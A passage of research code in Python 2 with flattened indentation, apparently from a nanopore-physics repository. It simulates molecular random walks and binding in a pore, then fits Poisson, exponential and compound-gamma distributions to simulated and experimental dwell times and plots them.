import matplotlib
matplotlib.use("Agg")
from matplotlib import gridspec
import matplotlib.pyplot as plt
import numpy as np
import os
import nanopores.tools.fields as f
HOME = os.path.expanduser("~")
PAPERDIR = os.path.join(HOME, "papers", "paper-howorka")
FIGDIR = os.path.join(PAPERDIR, "figures", "")
DATADIR = os.path.join(HOME,"Dropbox", "nanopores", "fields")
f.set_dir(DATADIR)
hpore=46.
#fieldsname='number_of_collisions_all'
fieldsname='number_of_collisions'
params=dict(avgbind1=2e7,avgbind2=3e4,P_bind1=0.,P_bind2=0.,z0=23.) # old one interval lengths(4,8,13)
#params=dict(avgbind1=23e6,avgbind2=3e4,P_bind1=0*0.035,P_bind2=0*3e-1,z0=hpore/2.+0.) # for binding everywhere
data=f.get_fields(fieldsname,**params)
data2=f.get_fields(fieldsname+'2',**params)
data3=f.get_fields(fieldsname+'3',**params)
Nc=np.array(data["Nc"])
Nc2=np.array(data2["Nc"])
Nc3=np.array(data3["Nc"])
lam=np.mean(Nc)
lam2=np.mean(Nc2)
lam3=np.mean(Nc3)
k=np.arange(0,21)
def P(k):
return pow(lam,k)/(factorial(k))*exp(-lam)
P=np.array([P(x) for x in k])
def P2(k):
return pow(lam2,k)/(factorial(k))*exp(-lam2)
P2=np.array([P2(x) for x in k])
def P3(k):
return pow(lam3,k)/(factorial(k))*exp(-lam3)
P3=np.array([P3(x) for x in k])
color1 = 'blue'
color2 = 'green'
color3 = 'red'
alpha=.25
s=30.
plt.figure(figsize=(5,4),dpi=80)
#gs = gridspec.GridSpec(1,2,width_ratios=[1,1])
#gs.update(wspace=0.,hspace=0.)
#plt1=plt.subplot(gs[0])
plt.hist(Nc,bins=19,normed=1,alpha=alpha,color=color1,histtype='bar',align='left')
len3 = plt.scatter(k,P,color=color1,s=s)
plt.hist(Nc2,13,normed=1,alpha=alpha,color=color2,histtype='bar',align='left')
len2 = plt.scatter(k,P2,color=color2,s=s)
plt.hist(Nc3,8,normed=1,alpha=alpha,color=color3,histtype='bar',align='left')
len1 = plt.scatter(k,P3,color=color3,s=s)
ax=plt.gca()
xlim=[-.5,16.]
ylim=[0.,.40]
xticks=np.arange(0.,17.,2.)
yticks=np.arange(0.,.5,.1)
ax.set_xlim(xlim)
ax.set_ylim(ylim)
ax.set_xticks(xticks)
ax.set_yticks(yticks)
ax.legend([len1,len2,len3],['length 3nm','length 8nm','length 14nm'],frameon=False)
ax.set_xlabel('binding attempts')
ax.set_ylabel('relative frequency/probability')
#plt2=plt.subplot(gs[1])
#plt2.plot([3.,8.,14.],[lam3,lam2,lam])
#plt2.scatter([14.],[lam], color=color1,s=100,marker='s')
#plt2.scatter([8.0],[lam2],color=color2,s=100,marker='s')
#plt2.scatter([3.0],[lam3],color=color3,s=100,marker='s')
#plt2.set_xlabel('length of binding site [nm]')
#plt2.set_ylabel('mean binding attempts')
plt.tight_layout()
plt.savefig('attempts.pdf')
#plt.show()
```
#### File: scripts/pughpore/rw.py
```python
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import tangent
import dolfin
import nanopores
import nanopores.models.randomwalk as randomwalk
from nanopores.tools.polygons import Rectangle
from nanopores.tools import fields, statistics
fields.set_dir_mega()
params = nanopores.user_params(
# general params
# geo
geoname = "pughcyl",
dim = 2,
diamPore = 6.,
rMolecule = 2.0779,
R = 40.,
Htop = 60.,
Hbot = 35.,
geop = dict(R=40., Htop=60., Hbot=35.),
x0 = None,
# physics
Qmol = 5.,
bulkcon = 1000.,
dnaqsdamp = 0.7353,
bV = -0.1,
posDTarget = True,
# solver
h = 2.,
frac = 0.5,
Nmax = 5e4,
imax = 30,
tol = 1e-3,
cheapest = False,
stokesiter = False, #True
hybrid = True,
reconstruct = False,
# random walk params
N = 100, # number of (simultaneous) random walks
dt = .2, # time step [ns]
walldist = 1., # in multiples of radius, should be >= 1
margtop = 15., # 35 is about the maximum
margbot = 0.,
rstart = 5.,
initial = "sphere",
# receptor params
bind_everywhere = False,
lbind = 8., # length of binding zone for long binding [nm]
ra = .2, # binding zone radius [nm] (1nm means whole channel)
collect_stats_mode = True,
)
########### WHAT TO DO ###########
todo = nanopores.user_params(
test_solver = False,
plot_dolfin = False,
plot_streamlines = False,
video = True,
plot_distribution = False,
fit_experiments = False,
fit_gamma = False,
fit_long = False,
fit_long_gamma = False,
)
########### SETUP ###########
NAME = "rw_pugh_0"
def binding_(params):
# TODO: make other params dependent on additional **args
return dict(
binding = True,
bind_type = "zone",
collect_stats_mode = params["collect_stats_mode"],
t = 1e9, # mean of exponentially distributed binding duration [ns]
ka = 1e9, # (bulk) association rate constant [1/Ms]
ra = params["ra"], # radius of the association zone [nm]
use_force = True, # if True, t_mean = t*exp(-|F|*dx/kT)
dx = 0.1, # width of bond energy barrier [nm]
)
def setup_rw(params, **_):
pore = nanopores.get_pore(**params)
rw = randomwalk.RandomWalk(pore, **params)
binding_params = binding_(params)
if params["bind_everywhere"]:
rw.add_wall_binding(**binding_params)
else:
r = pore.params.l3/2.
z = -pore.params.hpore/2. + pore.params.h4
wbind = 1.
lbind = params["lbind"]
bindsite = Rectangle((r, r + wbind), (z, z + lbind))
rw.add_domain(bindsite, exclusion=False, **binding_params)
#rw.domains[0].__dict__.update(exclusion=True, binding=True,
# bind_type="collision", eps=0., p=1., walldist=1.)
return rw
########### TEST AND PLOT SOLVER ###########
if todo.test_solver:
import nanopores.models.nanopore as nanopore
setup = nanopore.Setup(**params)
_, pnps = nanopore.solve(setup, True)
dolfin.interactive()
if todo.plot_dolfin:
rw = setup_rw(params)
dolfin.plot(rw.D[1])
dolfin.plot(rw.F)
dolfin.interactive()
if todo.plot_streamlines:
rw = setup_rw(params)
rw.plot_streamlines(both=True, R=20, Hbot=30, Htop=35,
maxvalue=1e-10, figsize=(5, 5))
plt.figure("D")
dolfin.plot(rw.D[1], backend="matplotlib")
#plt.show()
if todo.video:
rw = setup_rw(params)
randomwalk.run(rw)
########### PLOT ATTEMPT TIME DISTRIBUTION ###########
def NLS(ti, yi, t0=0., tol=1e-14):
"nonlinear least squares to fit exponential distribution with mean exp(x)"
xi = np.log(ti)
def f(x, xi, yi):
return np.sum((1. - np.exp(-np.exp(xi - x)) - yi)**2)
# minimize f by solving df(x) = 0 with newton method
df = tangent.grad(f)
ddf = tangent.grad(df)
x = np.log(t0)
while np.abs(df(x, xi, yi)) > tol:
x -= df(x, xi, yi)/ddf(x, xi, yi)
#print "|f(x)|", np.abs(df(x, xi, yi))
return np.exp(x)
def NLS2(ti, yi, t10=1., t20=100., w0=0.5, tol=1e-14):
"nonlinear least squares to fit DOUBLE exponential distribution"
xi = np.log(ti)
# find: characteristic times exp(x1), exp(x2) and weights w1, w2
def f(theta, xi, yi):
w = theta[0]
x1, x2 = theta[1], theta[2]
z = w*np.exp(-np.exp(xi - x1)) + (1.-w)*np.exp(-np.exp(xi - x2))
return np.sum((1. - z - yi)**2)
# minimize f by solving df(x) = 0 with newton method
df = tangent.grad(f)
ddf = tangent.grad(df, mode="forward")
def Jf(theta, xi, yi):
return np.array([ddf(theta, xi, yi, 1., [1,0,0]),
ddf(theta, xi, yi, 1., [0,1,0]),
ddf(theta, xi, yi, 1., [0,0,1])])
theta = np.array([w0, np.log(t10), np.log(t20)])
dftheta = df(theta, xi, yi)
while np.linalg.norm(dftheta) > tol:
print "|(grad f)(theta)|", np.linalg.norm(dftheta)
theta -= np.linalg.solve(Jf(theta, xi, yi), dftheta)
dftheta = df(theta, xi, yi)
return theta[0], np.exp(theta[1]), np.exp(theta[2])
def NLS_general(F, xi, yi, p0=1., tol=1e-12):
"nonlinear least squares to fit arbitrary f with any number of parameters"
# F = F(x, p), p0 MUST match len(p), F takes array of x
# F must be compatible with tangent module
def f(p, xi, yi):
return np.sum((F(xi, p) - yi)**2)
# minimize f by solving df(x) = 0 with newton method
n = len(p0)
df = tangent.grad(f)
ddf = tangent.grad(df, mode="forward")
ei = lambda i: np.eye(1, n, i)[0, :]
def Jf(p, xi, yi):
return np.array([ddf(p, xi, yi, 1., ei(i)) for i in range(n)])
p = np.array(p0)
dfp = df(p, xi, yi)
while np.linalg.norm(dfp) > tol:
print "|grad f|", np.linalg.norm(dfp)
p -= np.linalg.solve(Jf(p, xi, yi), dfp)
dfp = df(p, xi, yi)
return tuple(p)
def NLS_bruteforce(F, xi, yi, p, width=1., N=100):
# make p 1d array
p = np.atleast_1d(p)
# create parameter range
# TODO: this currently only applies to len(p)==2
x = np.logspace(-width, width, N)
xx = np.column_stack((np.repeat(x[:, None], len(x), 0),
np.tile(x[:, None], [len(x), 1])))
pp = p[None, :] * xx
f = np.sum((F(xi[None, :], pp) - yi)**2, 1)
i = np.argmin(f)
print "minimum:", f[i]
print "parameters:", pp[i, :]
return tuple(pp[i, :])
def NLS_annealing(F, xi, yi, p, N=100, n=10, sigma=5.,factor=0.5):
# N = size of population in one iteration
# n = number of iterations
# sigma = initial (multiplicative) standard deviation
# factor = factor to reduce sigma per iteration
print "initial", p
p = np.atleast_1d(p)
dim = len(p)
# make initial sigma act like multiplication by sigma^(+-1)
sigma = np.log(sigma)*np.ones(dim)
for k in range(n):
# create new population by adding multiplicative gaussian noise
P = p[None, :] * np.exp(np.random.randn(N, dim) * sigma[None, :])
# compute mean square loss on population
f = np.mean((F(xi[None, :], P) - yi)**2, 1)
# replace p by new best guess
p = P[np.argmin(f), :]
# update sigma
sigma *= factor
print "parameters:", p
print "minimum", min(f)
return tuple(p)
def fit_gamma(ti):
mu = ti.mean()
sigma = ti.std()
C = mu**2/sigma**2
def f(x):
return np.exp(x)/(2.*np.expm1(x)/x - 1.)
def f1(x):
y = 2.*np.expm1(x)/x - 1.
z = 2./x**2*(x*np.exp(x) - np.expm1(x))
return np.exp(x)*(1 - z/y)/y
# newton solve
K = 2.*C # initial value
#print "Newton iteration:"
for i in range(10):
dK = -(f(K) - C)/f1(K)
K = K + dK
# print i, "Residual", f(K) - C, "Value K =", K
#print
tau = mu*(1. - np.exp(-K))/K
return K, tau
from scipy.special import iv
class CompoundGamma(object):
def __init__(self, ti):
self.ti = ti
self.K, self.tau = self.fit_brute(ti)
def fit_todo(self, ti, n=40):
pass
def fit_naive(self, ti):
return fit_gamma(ti)
def fit_brute(self, ti, n=100):
# first guess to get orders of magnitude right
p = np.array(fit_gamma(ti))
# define problem # TODO:
#xi = np.sort(ti)[int(len(ti)/n/2)::int(len(ti)/n)]
#yi = np.arange(len(xi))/float(len(xi))
bins = np.logspace(np.log10(min(ti)), np.log10(max(ti)), n)
hist, _ = np.histogram(ti, bins=bins)
xi = 0.5*(bins[:-1] + bins[1:])
yi = np.cumsum(hist)/float(np.sum(hist))
# minimize
#K, tau = NLS_bruteforce(self.cfd_vec, xi, yi, p, width=1., N=100)
K, tau = NLS_annealing(self.cfd_vec, xi, yi, p, N=100, n=20)
return K, tau
def pdf_direct(self, tt, N=50):
a = self.K
t = tt/self.tau
S = np.ones_like(t)
s = np.ones_like(t)
for k in range(1, N):
s *= (a*t)/(k*(k+1.))
S += s
return np.exp(-t)*a/np.expm1(a) * S /self.tau
def pdf_bessel(self, tt):
a = self.K
t = tt/self.tau
return np.exp(-t)*np.sqrt(a/t)*iv(1., 2.*np.sqrt(a*t))/self.tau/np.expm1(a)
def cdf(self, tt, N=50):
a = self.K
tau = self.tau
gamma = sp.stats.gamma.cdf
S = np.zeros_like(tt)
s = 1.
for k in range(1, N):
s *= a/k
S += s*gamma(tt, k, scale=tau)
return 1./np.expm1(a) * S
def cfd_vec(self, tt, p, N=50):
# cdf that takes parameter as vector input, for fitting
a = p[:, 0:1]
tau = p[:, 1:2]
gamma = sp.stats.gamma.cdf
S = np.ones((p.shape[0], tt.shape[1]))
s = np.ones((1, tt.shape[0]))
for k in range(1, N):
s = s*a/k
S = S + s*gamma(tt, k, scale=tau)
return 1./np.expm1(a) * S
def gammainc(self, tt, k,tau):
# TODO: can not differentiate wrt k
# implement fitting yourself
#for j in range(k):
pass
class Compound2Gamma2(CompoundGamma):
"fit one or two compound^2 gammas with possibly cut off events"
def __init__(self, ti, ta=None, n_gammas=1, cutoff=False, use_ta_model=True):
self.ti = ti
self.n_gammas = n_gammas
self.cutoff = cutoff
# fitting of gamma (bind time) parameters
if ta is None:
# fit parameters tau, na, ga = ka*taua directly
# deduce ka for any given choice of taua
pass
else:
if use_ta_model:
# first fit attempt times to get na, taua,
# then fit bind times for tau, ga and deduce ka = ga/taua
pass
else:
# just simulate gamma-poisson distributed bind-times by drawing
# poisson/exp random numbers in forward mode, creating an
# simulated cdf to be matched with the experimental one
pass
self.fit(ti)
def fit(self, ti):
pass
def pdf_direct(self, tt, N=50):
# g = ka * taua
# q = g / (1 + g)
# P(N>0) = (1 - np.exp(-qa))
# P(N=n) = np.exp(-a) q**n/n! * Sk
# Sk = sum_k>=1 1/k!(n+k-1)!/(k-1)! (1-q)**k a**k
# f(t)* = np.exp(-t)/P(N>0) sum_n>=1 t**(n-1)/(n-1)! P(N=n)
# F(t)* = 1/P(N>0) sum_n>=1 Gamma(n,t) P(N=n)
pass
def cdf(self, tt, N=50):
pass
def pn_vec(self, n, ka, taua=None, na=None):
# ka = association rate in binding zone
# taua, na = parameters of attempt time distribution, determined by
# simulations
if taua is None:
taua = self.taua
if na is None:
na = self.na
#n = np.arange()
def cdf_vec(self, tt, p, N=50):
# cdf that takes parameter as vector input, for fitting
a = p[:, 0:1]
tau = p[:, 1:2]
gamma = sp.stats.gamma.cdf
S = np.ones((p.shape[0], tt.shape[1]))
s = np.ones((1, tt.shape[0]))
for k in range(1, N):
s = s*a/k
S = S + s*gamma(tt, k, scale=tau)
return 1./np.expm1(a) * S
if todo.plot_distribution:
N = 10000
params0 = dict(params, N=N)
rw = randomwalk.get_rw(NAME, params0, setup=setup_rw)
ta = rw.attempt_times
ta1 = ta[ta > 0.]
tmean = ta1.mean()
bins = np.logspace(np.log10(min(ta1)), np.log10(max(ta1)), 35)
#bins = np.logspace(-3., 2., 35)
hist, _ = np.histogram(ta1, bins=bins)
cfd = np.cumsum(hist)/float(np.sum(hist))
t = 0.5*(bins[:-1] + bins[1:])
#n = 100
#t = np.sort(ta1)[int(len(ta1)/n/2)::int(len(ta1)/n)]
#cfd = np.arange(len(t))/float(len(t))
plt.figure("ta_cfd", figsize=(4,3))
tt = np.logspace(np.log10(min(ta1)), np.log10(max(ta1)), 100)
plt.semilogx(t, cfd, "v", label="Simulations")
# naive exp. fit
#plt.semilogx(tt, 1. - np.exp(-tt/tmean), label="Simple exp. fit")
# proper exp. fit
toff = NLS(t, cfd, t0=tmean)
#plt.semilogx(tt, 1. - np.exp(-tt/toff), label="Exp. fit")
# ML gamma fit
#K, _, tau = sp.stats.gamma.fit(ta1)
K = (tmean/ta1.std())**2
tau = tmean/K
#plt.semilogx(tt, sp.stats.gamma.cdf(tt, K, scale=tau), label="Simple Gamma fit")
gamma = CompoundGamma(ta1)
plt.semilogx(tt, gamma.cdf(tt), label="Compound Gamma fit")
# double exponential fit
#w, toff1, toff2 = NLS2(t, cfd, t10=toff/2., t20=toff*2., w0=.4)
#plt.semilogx(tt, 1. - w*np.exp(-tt/toff1) - (1.-w)*np.exp(-tt/toff2),
# label="Double exp. fit")
plt.xlabel("Attempt time [ns]")
plt.ylabel("Cumulative frequency")
plt.xlim(xmin=1.)
plt.legend()
xlog = False
plt.figure("ta_hist", figsize=(4,3))
#tt = np.logspace(-1, 4., 20)
bins = np.linspace(0., 200., 30)
tt = np.linspace(0., 200., 300)
plt.figure("ta_hist", figsize=(4,3))
plt.hist(ta1, bins=bins, normed=True, log=False, label="Simulations")
#tt0 = tt if xlog else 1.
#plt.plot(tt, tt0/tmean * np.exp(-tt/tmean),
# label="Simple exp. fit, mean=%.3gns" % tmean)
#plt.plot(tt, tt0/toff * np.exp(-tt/toff),
# label="Exp. fit, mean=%.3gns" % toff)
#dt = rw.dt
#kk = np.arange(1000)
#k0 = tmean/dt
#plt.plot(tt, sp.stats.gamma.pdf(tt, K, scale=tau),
# label="Simple Gamma fit")
plt.plot(tt, gamma.pdf_direct(tt), label="Compound Gamma fit")
#plt.plot(tt, gamma.pdf_bessel(tt), ".k", label="Compound Gamma fit")
#plt.plot(kk*dt, poisson.pmf(kk, k0), label="Poisson fit")
#plt.plot(tt)
if xlog:
plt.xscale("log")
#plt.ylim(ymin=1e-10)
#plt.yscale("log")
plt.xlabel("Attempt time [ns]")
plt.ylabel("Rel. frequency")
plt.legend()
if todo.fit_experiments:
# get data
drop, tsample = fields.get("events_pugh_experiment", "drop", "t")
tsample = tsample.load()
log = True
std = False
cutoff = 0.1 # [ms], detection limit cutoff
# plot data with indication of two clusters
sep = 2.
large = tsample >= sep
toosmall = tsample < cutoff
plt.figure("data_scatter", figsize=(4, 3))
plt.scatter(tsample[toosmall], drop[toosmall], color="r")
plt.scatter(tsample[~toosmall], drop[~toosmall])
#plt.scatter(tsample[~large & ~toosmall], drop[~large & ~toosmall])
#plt.scatter(tsample[large], drop[large], color="g")
plt.axvline(x=cutoff, color="r")
plt.xscale("log")
plt.xlabel(r"$\tau$ off [ms]")
plt.ylabel(r"$A/I_0$ [%]")
# cut off data at detection limit threshold
tsample = tsample[~toosmall]
# fit with different methods and compare
T = statistics.LeftTruncatedExponential(tau=None, tmin=cutoff)
T2 = statistics.LeftTruncatedDoubleExponential(
tau1=None, tau2=None, w=None, tmin=cutoff)
T.fit(tsample, method="cdf", log=True, sigma=2., factor=0.9, n_it=50)
T2.fit(tsample, method="cdf", log=True, sigma=2., factor=0.9, n_it=50)
t = statistics.grid(tsample, 15, 0, log=log)
tt = statistics.grid(tsample, 100, 0, log=log)
ecdf = statistics.empirical_cdf(t, tsample)
t1 = statistics.grid(tsample, 15, 0, log=log)
tc, epdf = statistics.empirical_pdf(t1, tsample, log=log)
plt.figure("data_fit_cdf", figsize=(4, 3))
plt.plot(t, ecdf, "o", label="Experiment")
T.plot_cdf(tt, label="Truncated exp. fit", std=std)
T2.plot_cdf(tt, ":", label="Trunc. double exp. fit", std=std)
plt.xscale("log")
plt.ylabel("Cumulative probability")
plt.xlabel(r"$\tau$ off [ms]")
plt.legend(frameon=False)
print "CDF fit:", T2
#T.fit(tsample, method="pdf", log=True, sigma=2., factor=0.9, n_it=50)
#T2.fit(tsample, method="cdf", log=True, sigma=2., factor=0.9, n_it=50)
plt.figure("data_fit_pdf", figsize=(4, 3))
#plt.plot(tc, epdf, "o")
plt.bar(tc, epdf, 0.8*np.diff(t1), alpha=0.5, label="Experiment")
#T.plot_pdf(tt, "C1", log=log, label="Truncated exp. fit")
T2.plot_pdf(tt, ":C2", log=log, label="Trunc. double exp. fit", std=std)
plt.xscale("log")
plt.ylabel("Rel. frequency")
plt.xlabel(r"$\tau$ off [ms]")
plt.legend(loc="upper right", frameon=False)
#print "PDF fit:", T2
if todo.fit_long:
# now we focus only on the long-time cluster and fit that with different methods
drop, tsample = fields.get("events_pugh_experiment", "drop", "t")
tsample = tsample.load()
log = True
std = False
cutoff = 2. # [ms]
sep = 2.
large = tsample >= sep
toosmall = tsample < cutoff
plt.figure("data_scatter_long", figsize=(4, 3))
plt.scatter(tsample[toosmall], drop[toosmall], color="r")
plt.scatter(tsample[~toosmall], drop[~toosmall])
#plt.scatter(tsample[~large & ~toosmall], drop[~large & ~toosmall])
#plt.scatter(tsample[large], drop[large], color="g")
plt.axvline(x=cutoff, color="r")
plt.xscale("log")
plt.xlabel(r"$\tau$ off [ms]")
plt.ylabel(r"$A/I_0$ [%]")
# cut off data at detection limit threshold
tsample = tsample[~toosmall]
# fit with different methods and compare
T = dict()
T["exp"] = statistics.Exponential(tau=None)
T["truncexp"] = statistics.LeftTruncatedExponential(tau=None, tmin=cutoff)
#K = statistics.ZeroTruncatedPoisson(a=None)
#T["compoundgamma"] = statistics.Gamma(tau=None, K=K)
for k in T:
T[k].fit(tsample, method="cdf", log=True, sigma=2., factor=0.9, n_it=50)
t = np.logspace(-0.2, 2.3, 18)
tt = np.logspace(-0.2, 2.3, 100)
#t = statistics.grid(tsample, 15, 0, log=log)
#tt = statistics.grid(tsample, 100, 0, log=log)
ecdf = statistics.empirical_cdf(t, tsample)
#log = False
#t1 = statistics.grid(tsample, 8, 0, log=log)
t1 = np.logspace(np.log10(2.), 2.3, 10)
tt1 = np.logspace(np.log10(2.), 2.3, 100)
tc, epdf = statistics.empirical_pdf(t1, tsample, log=log)
plt.figure("data_long_fit_cdf", figsize=(4, 3))
plt.plot(t, ecdf, "o", label="Experiment (> 2ms)")
T["exp"].plot_cdf(tt, std=std, label="Exponential fit")
T["truncexp"].plot_cdf(tt, ":", std=std, label="Truncated exp. fit")
#T["compoundgamma"].plot_cdf(tt, "--", std=std, label="Compound Gamma fit")
plt.xscale("log")
plt.ylabel("Cumulative probability")
plt.xlabel(r"$\tau$ off [ms]")
plt.legend(frameon=False)
print "CDF fit:", T
plt.figure("data_long_fit_pdf", figsize=(4, 3))
plt.bar(tc, epdf, 0.8*np.diff(t1), alpha=0.5, label="Experiment (> 2ms)")
#T["exp"].plot_pdf(tt1, "C1", label="Exponential fit", log=log, std=std)
T["truncexp"].plot_pdf(tt1, ":C2", label="Truncated exp. fit", std=std, log=log)
#T["compoundgamma"].plot_pdf(tt, "--C3", label="Compound Gamma fit", std=std, log=log)
plt.xscale("log")
plt.xlim(xmin=1.5)
plt.ylabel("Rel. frequency")
plt.xlabel(r"$\tau$ off [ms]")
plt.legend(loc="lower center")
if todo.fit_long_gamma:
# now we focus only on the long-time cluster and fit that with different methods
drop, tsample = fields.get("events_pugh_experiment", "drop", "t")
tsample = tsample.load()
log = True
std = False
cutoff = 2. # [ms]
sep = 2.
large = tsample >= sep
toosmall = tsample < cutoff
plt.figure("data_scatter_long", figsize=(4, 3))
plt.scatter(tsample[toosmall], drop[toosmall], color="r")
plt.scatter(tsample[~toosmall], drop[~toosmall])
#plt.scatter(tsample[~large & ~toosmall], drop[~large & ~toosmall])
#plt.scatter(tsample[large], drop[large], color="g")
plt.axvline(x=cutoff, color="r")
plt.xscale("log")
plt.xlabel(r"$\tau$ off [ms]")
plt.ylabel(r"$A/I_0$ [%]")
# cut off data at detection limit threshold
tsample = tsample[~toosmall]
# get empirical attempt time disribution
N = 10000
params0 = dict(params, N=N)
rw = randomwalk.get_rw(NAME, params0, setup=setup_rw)
ta = rw.attempt_times
ta1 = 1e-9*ta[ta > 0.]
Ta = statistics.Empirical(ta1)
# get cb = 1/Vb
cb = 1./rw.domains[2].Vbind # [M]
# fit with different methods and compare
from collections import OrderedDict
T = OrderedDict()
ka = [1e6,1e7, 1e8, 1e9]
kastr = [r"$10^{%d}$" % (np.round(np.log10(ka_)),) for ka_ in ka]
kaformat = r"$k_a$ = %s/Ms"
I = range(len(ka))
rvalues = ["66", "99", "cc", "ff"]
linestyles = ["-.", "--", ":", "-"]
colors = ["#%s0000" % r_ for r_ in rvalues]
a_attempts = 4.1 # mean no. attempts for binding site length 8nm
tamean = ta1.mean()
p_binding_prob = OrderedDict()
for i in I:
Ra = ka[i] * cb
K = statistics.ZeroTruncatedPoisson(a=Ra*Ta)
T[i] = statistics.LeftTruncatedGamma(tau=None, K=K, tmin=cutoff)
p_binding_prob[i] = tamean * Ra / a_attempts
for i in T:
T[i].fit(tsample, method="cdf", log=True, sigma=2., factor=0.6, n_it=20)
ka1 = np.logspace(3.8, 11.2, 20)
T1 = OrderedDict()
error = []
for ka_ in ka1:
Ra = ka_ * cb
K = statistics.ZeroTruncatedPoisson(a=Ra*Ta)
T1[ka_] = statistics.LeftTruncatedGamma(tau=None, K=K, tmin=cutoff)
err = T1[ka_].fit(tsample, method="cdf", log=True, sigma=2., factor=0.6, n_it=20)
error.append(err)
for ka_, err in zip(T1, error):
print T1[ka_].X.K.a.sample(10000).mean(),
print ("%.4g" % ka_),
print err
t = np.logspace(-0.2, 2.3, 18)
tt = np.logspace(-0.2, 2.3, 100)
#t = statistics.grid(tsample, 15, 0, log=log)
#tt = statistics.grid(tsample, 100, 0, log=log)
ecdf = statistics.empirical_cdf(t, tsample)
#log = False
#t1 = statistics.grid(tsample, 8, 0, log=log)
t1 = np.logspace(np.log10(2.), 2.3, 10)
tt1 = np.logspace(np.log10(2.), 2.3, 100)
tc, epdf = statistics.empirical_pdf(t1, tsample, log=log)
plt.figure("data_long_gammafit_cdf", figsize=(4, 3))
##########
for i in T:
#if i==0:
# T[i].plot_cdf(tt, std=std, label=r"$k_a = 10^7$/Ms", color=colors[i])
#else:
T[i].plot_cdf(tt, std=std, label=kaformat % kastr[i],
color=colors[i], linestyle=linestyles[i])
plt.plot(t, ecdf, "o", label="Experiment")
plt.xscale("log")
plt.ylabel("Cumulative probability")
plt.xlabel(r"$\tau$ off [ms]")
plt.xlim(xmin=0.5)
plt.legend(loc="upper left", frameon=False)
print "CDF fit:", T
plt.figure("data_long_gammafit_pdf", figsize=(4, 3))
#########
for i in T:
T[i].plot_pdf(tt, label=kaformat % kastr[i], std=std, log=log,
color=colors[i], linestyle=linestyles[i])
plt.bar(tc, epdf, 0.8*np.diff(t1), alpha=0.5, label="Experiment")
plt.xscale("log")
plt.ylabel("Rel. frequency")
plt.xlabel(r"$\tau$ off [ms]")
plt.xlim(xmin=0.1)
plt.legend(loc="upper left", frameon=False)
plt.figure("data_long_gammafit_error", figsize=(4, 3))
plt.semilogx(ka1, error, "o")
plt.xlabel(r"$k_a$ [M$^{-1}$s$^{-1}$]")
plt.ylabel("Fitting error")
if todo.fit_gamma:
# now we focus only on the long-time cluster and fit that with different methods
drop, tsample = fields.get("events_pugh_experiment", "drop", "t")
tsample = tsample.load()
log = True
std = False
cutoff = 0.1 # [ms]
# cut off data at detection limit threshold
toosmall = tsample < cutoff
tsample = tsample[~toosmall]
# get empirical attempt time disributions
N = 10000
params0 = dict(params, N=N, bind_everywhere=False)
rw1 = randomwalk.get_rw(NAME, params0, setup=setup_rw)
ta1 = 1e-9*rw1.attempt_times
Ta1 = statistics.Empirical(ta1[ta1 > 0.])
cb = 1./rw1.domains[2].Vbind # [M]
params1 = dict(params, N=N, bind_everywhere=True)
rw2 = randomwalk.get_rw(NAME, params1, setup=setup_rw)
ta2 = 1e-9*rw2.attempt_times
Ta2 = statistics.Empirical(ta2[ta2 > 0.])
# fit with different methods and compare
from collections import OrderedDict
T = OrderedDict()
ka = [1e6,1e7,1e8,1e9]
#kastr = [("%.3g" % ka_) for ka_ in ka]
kastr = [r"$10^{%d}$" % (np.round(np.log10(ka_)),) for ka_ in ka]
#kastr = ["$10^6$", "$10^8$", "$10^9$", "$10^{10}$"]
kaformat = r"$k_a$ = %s/Ms"
I = range(len(ka))
rvalues = ["66", "99", "cc", "ff"]*4
linestyles = ["-.", "--", ":", "-"]*4
colors = ["#%s0000" % r_ for r_ in rvalues]
a_attempts = 4.1 # mean no. attempts for binding site length 8nm
tamean = ta1.mean()
p_binding_prob = OrderedDict()
error = []
def P2(ra):
colon = slice(None)
n = ra.ndim
#tta = np.random.choice(ta2, size=1000)
tta = ta2
tmp = ra[(colon,)*n + (None,)] * tta[(None,)*n + (colon,)]
tmp = np.exp(-tmp).mean(axis=n)
return 1. - tmp
for i in I:
ka1 = ka[i]
Ra1 = ka1 * cb
a1 = Ra1 * Ta1
p1 = 1 - np.exp(-Ra1*ta1).mean()
ka2 = statistics.Constant(c=None)
ka2.update(c=ka1/30.)
Ra2 = ka2 * cb
a2 = Ra2 * Ta2
#p2 = Ra2 * ta2.mean()
p2 = statistics.Function(P2, Ra2)
w = (1./p1 - 1.) * p2
K1 = statistics.ZeroTruncatedPoisson(a=a1)
K2 = statistics.ZeroTruncatedPoisson(a=a2)
T1 = statistics.LeftTruncatedGamma(K=K1, tau=None, tmin=cutoff)
T2 = statistics.LeftTruncatedGamma(K=K2, tau=None, tmin=cutoff)
# initial guesses to bias fit
T1.X.update(tau=10.)
T2.X.update(tau=0.1)
T[i] = statistics.OneOf(X=T2, Y=T1, w=w)
for i in T:
err = T[i].fit(tsample, method="cdf", log=True, sigma=2., factor=0.8, n_it=40)
error.append(err)
# ka1 = np.logspace(7., 12., 10)
# for ka_ in ka1:
# Ra = ka_ * cb
# K = statistics.ZeroTruncatedPoisson(a=Ra*Ta)
# Ti = statistics.LeftTruncatedGamma(tau=None, K=K, tmin=cutoff)
# err = Ti.fit(tsample, method="cdf", log=True, sigma=2., factor=0.6, n_it=20)
# error.append(err)
t = statistics.grid(tsample, 15, 0, log=log)
tt = statistics.grid(tsample, 100, 0, log=log)
ecdf = statistics.empirical_cdf(t, tsample)
t1 = statistics.grid(tsample, 15, 0, log=log)
tt1 = tt
tc, epdf = statistics.empirical_pdf(t1, tsample, log=log)
plt.figure("data_gammafit_cdf", figsize=(4, 3))
##########
for i in T:
#if i==0:
# T[i].plot_cdf(tt, std=std, label=r"$k_a = 10^7$/Ms", color=colors[i])
#else:
T[i].plot_cdf(tt, std=std, label=kaformat % kastr[i],
color=colors[i], linestyle=linestyles[i])
plt.plot(t, ecdf, "o", label="Experiment")
plt.xscale("log")
plt.ylabel("Cumulative probability")
plt.xlabel(r"$\tau$ off [ms]")
#plt.xlim(xmin=0.5)
plt.legend(loc="lower right", frameon=False)
print "CDF fit:", T
plt.figure("data_gammafit_pdf", figsize=(4, 3))
#########
for i in T:
T[i].plot_pdf(tt, label=kaformat % kastr[i], std=std, log=log,
color=colors[i], linestyle=linestyles[i])
plt.bar(tc, epdf, 0.8*np.diff(t1), alpha=0.5, label="Experiment")
plt.xscale("log")
plt.ylabel("Rel. frequency")
plt.xlabel(r"$\tau$ off [ms]")
#plt.xlim(xmin=0.1)
plt.legend(loc="upper right", frameon=False)
plt.figure("data_gammafit_error", figsize=(4, 3))
plt.semilogx(ka, error, "o")
plt.xlabel(r"$k_a$")
plt.ylabel("Fitting error")
import folders
